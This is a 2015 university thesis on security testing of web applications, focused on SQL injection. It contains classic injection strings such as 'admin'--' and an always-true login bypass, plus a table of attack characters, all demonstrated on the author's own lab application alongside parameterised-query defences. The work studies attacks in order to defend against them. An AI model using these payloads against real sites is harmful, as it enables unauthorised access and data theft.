Security Testing on Web Application Prepared by: Tausif Aghariya

PRT505
Thesis
Security Testing on Web Application
Prepared by:
Tausif Aghariya
S244431
Supervisors: Krishnan Kannoorpatti, Sami Azam
School of Engineering and IT
Faculty of EHSE
Charles Darwin University
Darwin
May, 2015
Acknowledgement
The writing of this thesis has been one of the most important parts of my Software
Engineering course. I express sincere thanks to my supervisors Krishnan Kannoorpatti and
Sami Azam for their constant support and guidance. I would like to say special thanks to my unit
coordinator Mirjam Jonkman, my course coordinator Charles Yeo, technical officer Balaji
Iyyaswamy, Ashikali Hasan and librarian Bandana Koirala for all their support and for giving
their precious time to help finish this thesis.
Abstract
The approach taken towards most web applications was unplanned, hence the need to raise security
standards, as considerable effort is required to maintain them and meet quality standards. With
existing and new technologies such as ASP, VB scripts and CGI, it is quite a hard task to assess
the quality of a web application because of the many factors that influence the performance of a website.
With data all over the place and users having little or no knowledge of how to protect
their data, the dark side of technology has always tried to devise its own path and now
poses a serious threat to web security with a new set of computer security vulnerabilities:
SQL injection and cross-site scripting (XSS). Although exploits such as buffer
overflows existed before them, SQL injection and cross-site scripting vulnerabilities are instances of the
broader class of input validation flaws, which are a result of changing security requirements. These
input validation based vulnerabilities therefore require fundamentally new techniques to
characterize and mitigate them. This dissertation focuses on how efficiently we can deal with these
web security vulnerabilities, addressing active issues primarily with SQL injection
attacks. Further, we divide the field of web applications to understand the vulnerable domains
and focus on the approach that could be followed to address the exploits that could
occur due to these vulnerabilities, and on the approaches or methodologies we can use to give
proper security to the web application.
Keywords: Web application security, web application vulnerabilities, security testing
methodologies
Table of Contents
Acknowledgement ..... 3
Abstract ..... 4
List of Figures ..... 8
List of Abbreviations ..... 10
I. Introduction ..... 11
1.1 Motivation ..... 12
II. Literature review ..... 14
2.1 Web Application Histories ..... 14
2.2 Web application and its components ..... 14
2.2.1 Database layer ..... 15
2.2.2 Operational layer ..... 15
2.2.3 User Interface layer ..... 15
2.3 Security needs for Web Application ..... 17
2.3.1 Financially motivated attacks ..... 18
2.3.2 Ideology Driven Attacks ..... 19
2.3.3 Attack-Discovery and Timeline ..... 19
2.4 Most prevailed vulnerabilities of Web application security ..... 19
III. Methodology and experimental scenario ..... 20
3.1 SQL Injection Attack ..... 20
3.2 SQLI Bypass Authentication Attack ..... 22
3.3 Types of SQL Injection ..... 27
3.3.1 Simple SQL injection Attacks (Ping-Chen, 2011) ..... 28
3.3.2 SQL Injection in MySQL By using URL method ..... 28
3.3.3 SQL Injection in MySQL By Blind Injection Method ..... 39
V. Literature review on web security practices ..... 47
5.1 History of web application security fields and practice ..... 47
5.2 Web security design with software engineering ..... 48
5.2.1 Security Requirements ..... 49
5.2.2 Secure Application Design and threat modelling ..... 50
5.2.3 Develop with Secure Coding ..... 50
5.2.4 Application Security Testing ..... 50
5.3 Standards of the Australian web security ..... 51
5.3.1 Content Security Policy ..... 51
5.3.2 HTTP Strict Transport Security ..... 51
5.3.3 Cookie Security Enhancements ..... 52
5.3.4 Input validation requirements standards ..... 53
5.4 Current situation for security testing of web application ..... 54
5.4.1 Google introduced two layer authentications ..... 56
5.4.2 Introduce SSL (Secure socket layer) ..... 57
VI. Methodologies for securing web applications ..... 57
6.1 Agile security testing ..... 57
6.2 Penetration testing ..... 59
6.3 Open Web Application Security Project (OWASP) ..... 61
VII. Approach for preventing SQL injection attack ..... 65
7.1 Preventing SQL Injection ..... 65
7.2 Prevention of SQL injection attacks by using Filters and techniques ..... 67
7.2.1 SQL dom ..... 68
7.2.2 Amnesia ..... 68
7.2.3 Input validation ..... 68
7.2.4 Session management ..... 68
7.3 Prevention of injection in MySQL by using URL method attack ..... 69
7.4 Analysis of web application code ..... 69
7.4.1 By Static code Analysis with polyspace code verifiers ..... 69
7.4.2 Measuring code complexity and checking with coding standards ..... 70
7.4.3 Proving the presence of errors ..... 70
7.4.4 Performing impact analysis ..... 71
7.5 URL method for prevention of SQL injection ..... 71
7.6 SQL injection by using Bypass authentication method ..... 73
7.7 Secure the Blind SQL Injection ..... 78
VIII. Conclusion ..... 80
IX. Reference ..... 81
X. Appendices ..... 87
10.1 Appendix A ..... 87
10.2 Appendix B ..... 90
10.3 Appendix C ..... 92
10.4 Appendix D ..... 93
List of Figures
Figure 1 Reasons for problem statement ..... 12
Figure 2 Web Application History (Owasp.org.au, 2015) ..... 14
Figure 3 Architecture of web application (Antunes, Laranjeiro, Vieira, & Madeira, 2009) ..... 16
Figure 4 External Attacker Motives over Web-App Attacks (McClure & Krüger, 2005) ..... 18
Figure 5 Types of SQL Injection Attack (Ping-Chen, 2011) ..... 27
Figure 6 Simple SQL Injection Attacks (Ping-Chen, 2011) ..... 28
Figure 7 Buy Cut Save Application Null Column Analysis ..... 32
Figure 8 Buy Cut Save Application Fetching Database Version ..... 33
Figure 9 Buy Cut Save Application Fetching Database Name ..... 35
Figure 10 Buy Cut Save Application Fetching User Information ..... 36
Figure 11 Buy Cut Save Application Database, Table and Column Enumeration ..... 37
Figure 12 Buy Cut Save Application Enumerating Column ..... 38
Figure 13 Buy Cut Save Application Dumping Database ..... 39
Figure 14 Buy Cut Save Application Blind SQL Injection Checking ..... 40
Figure 15 Buy Cut Save Application Blind SQL Injection Checking ..... 41
Figure 16 Buy Cut Save Application Getting Version in MySQL Database ..... 42
Figure 17 Buy Cut Save Application Getting Version in MySQL Database ..... 42
Figure 18 Buy Cut Save Application Enumerating Name from Database ..... 43
Figure 19 Buy Cut Save Application Enumerating Name from Database ..... 44
Figure 20 Buy Cut Save Application Enumerating Name from Database ..... 44
Figure 21 Buy Cut Save Application Enumerating Column Name ..... 45
Figure 22 Buy Cut Save Application Enumerating Column Name ..... 46
Figure 23 History of Web application Development till Hacking Arrives (Owasp.org.au, 2015) ..... 47
Figure 24 Security in SDLC Process (SANS Institute, 2007) ..... 49
Figure 25 HTTP Strict Transport Security ..... 52
Figure 26 Australian Standard Input Validation Requirements ..... 53
Figure 27 Steps for Security Testing ..... 55
Figure 28 Top 10 Reported Vulnerabilities in Web Application ..... 56
Figure 29 Agile Software Testing Process ..... 59
Figure 30 Penetration Testing ..... 61
Figure 31 OWASP Testing Work Flow (Owasp.org.au, 2015) ..... 62
Figure 32 Prevention for SQL Injection (Dupaul, 2015) ..... 66
Figure 33 Defensive Coding ..... 67
Figure 34 Single Filter for Different Pages ..... 72
Figure 35 Web Application Filter Architecture ..... 72
Figure 36 Buy Cut Save Application Login Page ..... 73
Figure 37 Buy Cut Save Application Login Page ..... 75
Figure 38 Buy Cut Save Application Category Form Page ..... 76
Figure 39 Buy Cut Save Application Category Form Page ..... 77
Figure 40 Buy Cut Save Application Category Form Page ..... 79
List of Abbreviations
API: Application Programming Interface
BCS: Buy Cut Save
CGI: Common Gateway Interface
CSS: Cascading Style Sheet
DB: Database
ERP: Enterprise Resource Planning
HSTC: History of Science and Technology
HTML: Hyper Text Mark-up Language
HTTP: Hyper Text Transfer Protocol
HTTPS: Hyper Text Transfer Protocol with Secure Socket Layer
MD5: Message Digest 5
MySQL: My software query Language
OWASP: Open Web Application Security Project
SDLC: Security Development Life Cycle
SQLI: Structured Query Language Injection
SSL: Secure Socket Layer
UI Layer: User Interface Layer
UML: Unified Modelling Language
URL: Uniform Resource Locator
XML: Extensible Mark-up Language
XSS: Cross Site Scripting
I. Introduction
Gone are the days when the web was all about static pages (HTML was introduced as a static format;
there were no form or input tags, and hence HTTP did not come with a POST method), with
very little to no interaction for users. It all started in the year 1993, when the
Mosaic browser was released with extended features like lists, nested lists, inline pictures and fill-out
forms, but it received a lot of uncertainties as it was not designed properly (Atefeh, Suhami,
& Antunes, 2012). In the same year the Common Gateway Interface (CGI) was designed, which would
“dynamically generate HTML server-side scripts” on the given input. Within no time
Netscape 2.0 came up with JavaScript, made the world aware of its wonders, and it
is still helping us take the technology to the next level (Ben, 2003). In 1997 Microsoft
changed the face of the World Wide Web by introducing iframes in Internet Explorer, which
led to new revolutions in browser technology by loading data
asynchronously, and Microsoft immediately pushed the “XMLHTTP” interface in the release
of IE5 (Curphey & Arawo, 2006). Slowly this technology was picked up by other browsers, which
followed with “XMLHttpRequest”. In the new millennium, 2000, web applications entered a new
phase as web application frameworks (Web 2.0, which allowed users to do more than just
retrieve information) were introduced and a new era began. We call this the fundamental step
because Web 2.0 created a platform for building web-aware applications that are highly
interactive and user centric (Ben-Natan, 2005). Without Web 2.0 the Internet would be
extremely different from today: there would be no e-commerce (such as eBay, Flipkart,
Amazon), webmail, internet messaging, internet banking, international share trading,
forums or web communities (Twitter). With the advent of Web 2.0, greater than before
information sharing through networking communities, and the growing adoption of the
web into business and service delivery, websites are often attacked directly as they stand
as the face of the business (Gavin, Eric & Schulte, 2005).
1.1 Motivation
- Problem Statement:
Vulnerabilities are still major security issues in web applications and cause many exploits.
- Reason for Problem:
Figure 1 Reasons for problem statement
As shown in Figure 1, there are many reasons why vulnerabilities are still
present in web applications. Nowadays developers try to add more and more functionality to
a web application. That means developers need to write more code for the app, which
creates countless coding errors and more opportunity for vulnerable code. Security testing
methodologies and processes for web applications only arrived in early 2001, so developers are not
getting sufficient security testing training. Moreover, they give less priority to risk
analysis. Based on my research, these are the reasons I consider to explain why vulnerabilities
are still present in web applications.
- Proposed Solution:
The preferable solution to this problem is to maintain the security standard of the web
application by using suitable security testing methodologies and to give proper protection
against vulnerabilities in the web application.
- Overview of the Report:
This report is mainly divided into four phases. The first phase includes an introduction to web
applications, the methods of web applications and their architecture, why security is necessary for web
applications, and the most prevalent vulnerabilities of web applications.
The second phase explains the SQL injection attack, which is the world's second highest attack
technique on web applications. It includes how SQL injection works, the types of SQL
injection, and a practical implementation on one BCS (Buy Cut Save) web application, in which the
whole database of the web application is hacked by using the SQL injection technique.
From the third phase onwards, the report explains security testing practice, the
current situation of security testing approaches, the different methodologies available for
using a security testing process in web application development, how Australian security
standards are set for web applications, and how, by using the security testing process, we can
protect the BCS web application that we hacked by using SQL injection.
- Tested Web Application:
The installation of the vulnerable web application was guided by my supervisors; I
established a lab in CDU with the permission of the IT department. I established my own server
and domain in the lab, and I installed the BSC PREDICTION web application for testing my SQL
injection methods. I used that lab for all my testing and thesis related work.
The example vulnerable code is helpful to illustrate the SQL injection vulnerability. The
analysis clearly shows that the variable id is not filtered, hence any input can pass
through it to the application.
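To make the point about the unfiltered variable id concrete, here is an added example (not code from the thesis or from the BCS application) that puts the unfiltered lookup beside a validated, parameterised one and runs both against an in-memory SQLite table standing in for the application's MySQL database; the table name, columns and sample rows are constructed for the demonstration.

```python
"""Added example (not from the thesis): the unfiltered `id` lookup the
text describes beside a hardened version, run against an in-memory SQLite
table standing in for the BCS application's MySQL database.
Table name, columns and rows are constructed for this demonstration."""
import re
import sqlite3

# Constructed sample rows standing in for a products table.
PRODUCTS = [
    (1, "Saw blade", 19.90),
    (2, "Drill bit", 4.50),
    (3, "Timber pack", 32.00),
]


class InvalidParameter(ValueError):
    """Raised when a request parameter fails allow-list validation."""


def make_db():
    """Build the in-memory database that both lookups run against."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL)"
    )
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", PRODUCTS)
    return conn


def lookup_unfiltered(conn, raw_id):
    """Vulnerable pattern from the text: the URL parameter `id` is spliced
    straight into the SQL string, so whatever the client sends becomes part
    of the statement and is interpreted as SQL rather than as a value."""
    sql = "SELECT id, name, price FROM products WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, raw_id):
    """Defensive pattern: allow-list validation first (a product id is a
    short decimal integer and nothing else), then a bound parameter so the
    database driver never treats the value as SQL syntax."""
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        raise InvalidParameter("id must be a positive integer")
    sql = "SELECT id, name, price FROM products WHERE id = ?"
    return conn.execute(sql, (int(raw_id),)).fetchall()


def compare(raw_id):
    """Run one request parameter through both lookups and report how many
    rows each returns ('rejected' when validation refused the request)."""
    conn = make_db()
    unfiltered_rows = len(lookup_unfiltered(conn, raw_id))
    try:
        hardened_rows = len(lookup_hardened(conn, raw_id))
    except InvalidParameter:
        hardened_rows = "rejected"
    return unfiltered_rows, hardened_rows


if __name__ == "__main__":
    # A legitimate request: both versions return the single matching row.
    print("id=2        ->", compare("2"))
    # A tampered parameter: the unfiltered query returns every row, while
    # the hardened version refuses the request before it reaches the DB.
    print("id=2 OR 1=1 ->", compare("2 OR 1=1"))
```

The same two-step defence (allow-list the parameter, then bind it) applies unchanged to a MySQL driver; only the placeholder syntax differs.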
II. Literature review
2.1 Web Application Histories
Figure 2 explains how web application technologies arrived over time. The
present-day web is completely embraced by millions of small, medium and large
scale businesses as an economical medium to communicate and exchange information with
prospects, and to transact with clients, partners and anyone else for that matter. If we take a look
at the current situation, large web apps are being developed and have become
unmanageable, with messes of jQuery and application backend code leading to flaws in
the application (Fahad & Sarrab, 2011).
Figure 2 Web Application Histories (Owasp.org.au, 2015)
2.2 Web application and its components
A web application can be defined as a highly programmed environment that allows mass
customization through the immediate deployment of a large and diverse range of applications
to billions across the globe. For the past 10 years (or more), the web has been playing a vital role in
many business transactions (Cross & Books24x7, 2007). Undoubtedly, it has been
wholeheartedly accepted by millions of people and businesses and has become an inexpensive
channel to communicate and exchange information.
In fact, the web provides a channel through which marketers can sell their products by
advertising, analysing the number of people visiting their sites and communicating with them.
People nowadays get their work done sitting right in front of their computer or mobile,
and no wonder the reason behind this is the 'web application(s)' (Doupé,
Cova & Vigna, 2010). All the data regarding transactions, or anything else, should be
fetched, processed and stored somehow for further use, and this data can be retrieved through
the web application's enquiry or login forms. Common examples of web
applications include webmail, online banking and shopping sites, Google Docs, gaming sites, etc.
(Antunes, Laranjeiro, Vieira, & Madeira, 2009).
A web application generally comprises the following three layers:
- The DATABASE layer (Model): where the entire information gets stored.
- The OPERATIONAL layer (Controller): where the logic behind the application is written.
- The UI layer (View): the interface through which the user(s) interact.
2.2.1 Database layer:
It is used to store the entire information. This layer is an internal interface and is not exposed to
the user. DB access related calls are not made directly to the storage engine; instead, all
DB access is routed through the DB layer. All the data is structured into objects,
these objects in turn are stored in the form of tables, and the attributes of an object are stored
as columns in the database.
The database layer is responsible for fetching, creating, updating and deleting (CRUD
operations) individual records, and attributes and values within records. All DB vendors
provide their own interface tailored to their products, which leaves it to the application
programmer to implement code for all the database interfaces he or she would like to
support. Some of the database vendors include Oracle, SQL Server, MySQL, DB2 and
PostgreSQL.
2.2.2 Operational layer:
This is the layer where the application's business logic is defined. It is solely
responsible for handling user requests and rendering responses within the stipulated time with the
aid of the DB and UI layers. The operational layer can be treated as a manager who ensures that all the
resources needed for completing a task are delegated to the proper layers. It also waits for
requests from clients, authenticates them, delegates data fetching or processing to the model,
selects the data that is to be presented to the client, and finally delegates the rendering process to
the UI layer. Some implementations of this layer include PHP, Perl and ASP.
2.2.3 User Interface layer:
This is the interface where the user interaction happens. Whenever a user raises a request,
based on controller actions the data is retrieved from the underlying DB and rendered to the
HTML page or the UI for the user to consume. This layer is not limited to HTML or any text
representation of data; it can also deliver a wide variety of formats such as pictures,
documents, videos and any other format the user asks for. This layer makes use of
technologies like HTML, CSS, JavaScript (and its frameworks) and many more.
Figure 3 Architecture of web application (Antunes, Laranjeiro, Vieira, & Madeira,
2009)
As mentioned in Figure 3, web applications can be defined as computer programs
which allow users to retrieve or submit data from (to) a database using their preferred web
browser. Though there are many advantages of web applications, one significant advantage
is that they perform independently: web apps can be quickly deployed anywhere at no cost and
no installation is required at the user's end.
It is also quite important to understand that web applications generally work over the HTTP
protocol, where HTTP functions as a "request-response" protocol in the client-server model.
A connection is established in the form of sessions; so-called HTTP sessions refer to a
customized HTTP cookie used to associate a certain amount of information with the client. This
cookie is termed a session hash and, as a common practice, is encrypted to store the user's or client's
access information.
2.3 Security needs for Web Application:
There is no doubt about it: the diverse techniques available to attackers have made defending web
applications a herculean task. The SANS Institute rates "Internet-facing Web sites that are
vulnerable to attack as the second highest cyber security risk to enterprises" (Bayles &
Books24x7, 2007). Web applications are now meant for cost-effective business solutions and
have proved to make business easy. For the same reason they are widely used across all sectors,
including business, banking, finance, education, healthcare and technology among
others (Bayles, A.W. & Books24x7, 2007). Threats over the internet are so poised that nothing
on the web is considered safe. Online services integrated with web applications
have grown at a very brisk pace with minimal to no attention to security, which
leaves many corporate sites vulnerable to attacks.
Websites and web applications facing the internet are low hanging fruit for
attackers, as these applications handle so much data, including personally identifiable
information and private data of the organization and its clients. Many prominent organizations
have fallen prey to hackers because they invest too much in network security and little
in web application security, which is almost like "We buy good doors when the problem is
with windows" (Fong, Gaucher & Okun, 2008). A security breach can put everything at stake. It
damages customer trust, reputation and revenues, and can also lead to legal liabilities.
Website functionality is purely dependent on its web applications. These applications are
programmed to capture, process, transmit and store personal and confidential information
such as banking details, SSNs and medical history. The other side of attacks is not to steal the data
present in the applications' database servers but to turn trusted websites into
malicious websites for client-side exploits (Razzaq, Hur, Farooq & Masood, 2012).
White Hat Sentinel is an organization that assesses the largest e-commerce, healthcare and
technology service firms. Their security statistics report confirmed that 83% of websites
are prone to at least one severe vulnerability (Fonseca, Vieira & Madeira, 2007).
Web applications will remain the punch bags of the internet. They are compromised in one of
two ways: either by exploiting a weakness in the application or by impersonation with
stolen credentials (McClure & Krüger, 2005). Verizon's DBIR suggests that 3,937 incidents
have been recorded, out of which 490 are confirmed data disclosures. Two out of every three
attacks are somehow driven by the ideology and rules of activist groups, and less than one in
every three is attributed to financially motivated attackers with the intention of espionage.
Figure 4 External Attacker Motives over Web-App Attacks (McClure & Krüger, 2005) [bar chart; categories: Ideology/Fun, Financial, Espionage; axis 0% to 70%]
2.3.1 Financially motivated attacks:
Figure 4 explains that every informational asset has, and always will have, some value, which is
called the hack value for the attackers. Financially driven attacks are meant to gain access to
money, and for the same reason financial and retail organisations stand as their prime
target because their data is as good as money (Shelly, 2010). In a financial
industry or organization the attacks will mostly be aimed at gaining access to the web
application, as this gives logical access to the money. This means that user
credentials and single-factor authentication achieve the desired result for the attacker. In
order to steal the credentials there are many known and reported tactics, but the usual
tactics we come across are as follows (McClure & Krüger, 2005):
- Phishing techniques, which trick the user into supplying the credentials, or installing
malware to steal the credentials.
- One of the oldest methods is password guessing using brute force techniques.
- The rarest of all, and one that requires skill to perform, is directly targeting the
application using SQL injection, in other words application-level attacks, or attacking the
user management system itself to seek user credentials and bypass authentication.
The retail industry suffers the majority of attacks aimed at payment card information, with
95% of the total reported incidents being about stealing payment card information (Morgan,
2006). This information is often easily accessible by simply exploiting a web application or
stealing saved credentials. Social engineering has also played, and still plays, an
effective role, as this family of attacks works well enough. SQL injection dominance in
web applications still continues, reaching 80% in the retail industry, followed by
techniques to install shells through local file inclusion (LFI) and remote file inclusion (RFI) with
7% (Meier & Meier, 2006).
2.3.2 Ideology Driven Attacks:
These attacks represent the identified motives for attacking web applications by attackers
based in different geographical locations. The majority of the attacks are focused on truly
exploiting the targets (Simpson, Backman & Corley, 2012).
The attacks are driven by different reasons, but ideological attackers are much less
concerned with getting the business data. One can expect attacks mostly involving
defacement, sending a message, or hijacking the server to attack others, which can even
lead to cyber extortion. Web servers were the only assets targeted in most of the ideology
motivated attacks (Sarasan, 2013).
2.3.3 Attack-Discovery and Timeline:
Within financially motivated attacks, discovery can be recorded and the attack notification
reported by the customer itself; often the customer is the one to notice such fraudulent activity
before anyone else. Below are the graphs showing the "Discovery Timeline with respect to
Attacks" (Manuel Costa, Miguel Castro, Zhou, Zhang & Peinado, 2007).
2.4 Most prevalent vulnerabilities in web application security
"What we need is more secure web applications, not just more security-enabled applications." The most important task in any industry is to identify the vulnerabilities before an attacker does and to provide appropriate measures to safeguard the application and the reputation of the organization from any attack (Insight Security Research (NISR) publication, 2002). Not only discovering the vulnerabilities but also estimating the associated business risks is equally important. Whatever security assessment methodology an organization uses in the development life-cycle of the application, security concerns may still be found in the design, the architecture, or the framework (Insight Security Research (NISR) publication, 2002). At a later stage, security issues may be found through secure code review or application security testing (penetration testing), or a security weakness may not be identified even after release, until the application is compromised. According to White Hat Sentinel, in a survey of 76 organizations across different industries, the results suggest that the relationship between software security controls and software development life-cycle behaviours on the one hand, and vulnerability outcomes and reported breaches on the other, is too complicated to draw any conclusion (Tajpour, Ibrahim & Sharifi, 2012).
Reports such as the Verizon Data Breach Report, the OWASP Top 10, White Hat Sentinel, the Symantec Threat Report, or essentially any other report in that context, focus on identifying the most severe risks for an organization in different business areas. Any risk is evaluated based on security controls, threat agents and the business impact on the organization. Business impacts are considered application- or business-specific, and threat agents are application-specific; both depend on the details of the application within the enterprise (Oehlert, 2005). According to the 2014 web application security reports, almost all the reports listed the same risks associated with attacks on web applications; the top 10 attack types have been listed by attack type and business impact (Howard, LeBlanc & Viega, 2010). The top 10 web application attacks identified by Howard, LeBlanc and Viega are given in Appendix A.
III. Methodology and experimental scenario
3.1 SQL Injection Attack
Web applications have become more sophisticated and increasingly complex in their architecture. Their existence has given a new dimension to e-commerce and to the entire enterprise resource planning industry, and this is clearly visible today as we stand as end-users of these applications. The availability of these enterprise systems and the sensitive data they store, handle and process has become critical to all major industry sectors, not only the e-commerce industry (Bayles, A.W. & Books24x7, 2007).
SQL injection attacks belong to the family of injection attacks. SQL, generally pronounced "sequel", stands for Structured Query Language and is used specifically for querying databases (Antunes, Vieira, 2009). SQL injection is considered the most common application-layer attack; it is multifaceted and dominant. These attacks are only possible if the target application has a back-end database, is improperly coded, and has no proper control over input validation. Successful exploitation of these weaknesses allows the attacker to read and modify (insert, update, delete) sensitive data, and can provide administrative access to the database, where operations such as shutting down the database or taking ownership of it become possible (Cross, & Books24x7, 2007). Because of the ubiquity of SQL across different platforms and databases, this attack has been found to be portable. In order to carry out this family of attacks, one needs considerable knowledge of client-server technologies, web applications and databases, and also patience (Portland, 2013).
Appendix D, introduced by Razzaq, Hur, Farooq & Masood in 2012, explains the attack factors and impacts of SQL injection attacks.
Attacks that use SQL injection target websites or web applications that allow submitting data to, and retrieving data from, databases over the internet. Databases play a vital role in the functioning of modern websites and web applications, as they store the data the sites or applications need to render their services by providing appropriate content to authorized customers, stakeholders and employees (Cross, & Books24x7, 2007). Data such as end-user credentials, banking information and companies' proprietary information may reside in the database and can be accessed by authorised users via customized or off-the-shelf applications.
SQL injection attacks are performed with crafted SQL code that is appended to or inserted into the web application's user input parameters; this tricks the interpreter into executing the input as part of a query to the database. Any system that constructs SQL queries might be vulnerable, and SQL as a language for constructing database queries provides diversified coding options (Dharam, Shiva, 2014).
Based on how the application functions and processes user-supplied data, SQL injection can be used to perform the following types of attacks (Doupé, Cova & Vigna, 2010):
- Authentication bypass: using this attack, an attacker logs on to an application without providing a valid username and password, and gains administrator privileges.
- Information disclosure: using this attack, an attacker can obtain sensitive information stored in the database.
- Compromised data integrity: an attacker uses this attack to deface a website or web page, insert malicious content into web pages, or alter the contents of a database.
- Compromised data availability: attackers use this attack to delete database information, or to delete log or audit information contained in a database.
- Remote code execution: this allows an attacker to compromise the host operating system.
Example of a small basic SQL vulnerability:
Let's consider the example of a web application hosted by a bookstore to make its service available to customers online.
3.2 SQLi Bypass Authentication Attack
When customers search for all books in the store published by some publisher XYZ, the application performs the query below (Shar & Tan, 2013):
    SELECT Author, Book_name, Published_year FROM bookstore WHERE publisher = 'XYZ'
Now consider a customer who searches for books published by T'XYZ. The application then performs the query below:
    SELECT Author, Book_name, Published_year FROM bookstore WHERE publisher = 'T'XYZ'
Server error message: Incorrect syntax; unclosed quotation mark before the character string.
Note: when an application behaves this way, we can say it is open to SQLi attacks.
This flaw allows an attacker to manipulate the query so that it retrieves information on every book present in the bookstore, by using the string below:
    XYZ' or 1=1--
Inserting the above crafted string into the query gives an unintended result:
    SELECT Author, Book_name, Published_year FROM bookstore WHERE publisher = 'XYZ' or 1=1--'
Since 1 always equals 1, the database is permitted to retrieve every book present in the table bookstore.
Note: "--" (double hyphen) in SQL tells the interpreter to ignore the rest of the line after it, as it is a comment. With MySQL there should be a space after "--" (or "#" used instead) to mark a comment.
In certain instances, a very small and simple SQL injection flaw can have an immediate critical impact. Most applications run with a form-based login function that uses a database to store the users' authentication information (credentials) and performs a SQL query to verify each login attempt made by the user. Below is a small example of such a query:
    SELECT * FROM users WHERE username = 'JOHN' AND passwd = 'NHOJ'
An attacker can inject a crafted request either in the username text field or in the password text field to alter the query to his own requirement. Assume, for instance, that the attacker knows that the administrator username of the application is "admin". Now that he knows the username, he can log in as admin just by supplying any password and the following username:
    admin'--
By inserting "admin'--" in the query, the query becomes the following:
    SELECT * FROM users WHERE username = 'admin'--' AND passwd = 'abcdef'
With the comment symbol placed before the password check, password validation has been bypassed.
Now suppose the attacker does not know the administrator's username. The following might help an attacker gain access:
- Normally, in most applications, the first account in the database is the admin user, as this account is used to create the other accounts in the application.
- Further, if the submitted query returns more than one user, many applications will simply process the details of the first user.
An attacker can frequently log in to the application as the first user in the database by passing the following string as the username:
    ' OR 1=1--
This causes the application to perform the following query:
    SELECT * FROM users WHERE username = '' OR 1=1--' AND password = 'abcde'
- In most cases, a SQL injection vulnerability can be identified and verified just by passing a single untrusted input into the application.
Below are the snapshots of the testing I did in my lab on the BCS web application, which I developed myself and also used for this testing.
- The user fills out the login form like this:
    Login: ' OR ''='
    Password: ' OR ''='
- This gives SQLQuery the following value:
    SELECT Username FROM Users WHERE Username = '' OR ''='' AND Password = '' OR ''=''
Instead of comparing the user-supplied data with the data present in the Users table, the query compares '' (nothing) to '' (nothing), which of course will always return true.
- We can see in the snapshot that the username is filled in as ' OR ''=' and the password as ' OR ''='. Instead of comparing the user-supplied data with the data present in the Users table, the query compares '' (nothing) to '' (nothing), which of course will always return true. You can see in the snapshot below that the user can enter the main page by using the authentication bypass method of SQL injection.
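As an added example, not code from the thesis or from the BCS application, the following Python program reproduces the bookstore search query of section 3.2 and the form-based login query above, first built by string concatenation (the vulnerable form the thesis describes) and then with parameterised queries, so the effect of the crafted inputs XYZ' or 1=1--, admin'-- and ' OR ''=' can be compared directly. It uses Python's built-in sqlite3 module with an in-memory database; the table and column names follow the thesis, while the rows, the user admin and its password are constructed sample data. Like the thesis's query, the sample stores the password in clear text for simplicity; a real application stores only a password hash and compares against that.

```python
import sqlite3


def make_db():
    """Build the constructed sample database (in memory, sample rows only)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE bookstore (Author TEXT, Book_name TEXT,
                                Published_year INTEGER, publisher TEXT);
        INSERT INTO bookstore VALUES ('A. Writer', 'First Book', 2001, 'XYZ');
        INSERT INTO bookstore VALUES ('B. Author', 'Second Book', 2005, 'XYZ');
        INSERT INTO bookstore VALUES ('C. Scribe', 'Other Book', 2010, 'ABC');
        CREATE TABLE users (username TEXT, passwd TEXT);
        INSERT INTO users VALUES ('admin', 's3cret-constructed');
        INSERT INTO users VALUES ('JOHN', 'NHOJ');
        """
    )
    return conn


# ---- Vulnerable versions: user input is pasted into the SQL text ----------

def search_vulnerable(conn, publisher):
    """The thesis's search query, built by concatenation."""
    sql = ("SELECT Author, Book_name, Published_year FROM bookstore "
           "WHERE publisher = '" + publisher + "'")
    return conn.execute(sql).fetchall()


def login_vulnerable(conn, username, password):
    """The thesis's login check, built by concatenation."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND passwd = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def search_raises_error(conn, publisher):
    """True if the vulnerable search fails with a SQL syntax error: the
    'unclosed quotation mark' behaviour the thesis uses as its first probe."""
    try:
        search_vulnerable(conn, publisher)
        return False
    except sqlite3.OperationalError:
        return True


# ---- Hardened versions: the value travels separately from the SQL text ----

def search_safe(conn, publisher):
    """Same query with a bound parameter: the input can never close the quote."""
    sql = ("SELECT Author, Book_name, Published_year FROM bookstore "
           "WHERE publisher = ?")
    return conn.execute(sql, (publisher,)).fetchall()


def login_safe(conn, username, password):
    """Same login check with bound parameters; the comment and OR tricks
    become ordinary characters compared against the stored values."""
    sql = "SELECT username FROM users WHERE username = ? AND passwd = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    for value in ("XYZ", "T'XYZ", "XYZ' or 1=1--"):
        vuln = ("syntax error" if search_raises_error(db, value)
                else "%d rows" % len(search_vulnerable(db, value)))
        print(repr(value), "vulnerable ->", vuln,
              "| safe ->", len(search_safe(db, value)), "rows")
    for user, pwd in (("admin'--", "abcdef"), ("' OR ''='", "' OR ''='")):
        print(repr(user), "vulnerable login:", login_vulnerable(db, user, pwd),
              "| safe login:", login_safe(db, user, pwd))
```

With the vulnerable functions, T'XYZ produces the syntax error, XYZ' or 1=1-- returns all three books, and both login strings succeed without a valid password; with the bound-parameter versions the same inputs return no rows and no login, because the database receives the SQL text and the values as separate items and never re-parses the values as SQL.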
There may even be instances where flaws are very subtle, making it hard to distinguish them from other categories of vulnerability or from small security weaknesses that pose no threat (Cross, & Books24x7, 2007).
Note: with applications accessing a back-end database, it is quite important to verify URL parameters, the POST functions implemented by the application, HTTP headers and cookies.
Attack characters                   Description
' or "                              Character string indicators
-- or #                             Single-line comment
/*...*/                             Multi-line comment
?parameter1=xyz&Parameter2=123      URL parameters
PRINT                               Useful as a non-transactional command
@variable                           Local variable
@@variable                          Global variable
@@version                           Displays the SQL Server version
In order to successfully exploit any SQL injection vulnerability it is necessary to break out of the quotes, because the input supplied by the end user is incorporated into a SQL command and is placed inside single quotes (Cross, & Books24x7, 2007).
Detecting SQL injection issues: try passing a single quote as an unexpected input character and observe whether any error, or any other change in the result, reveals exactly where the user-given input is not sanitized.
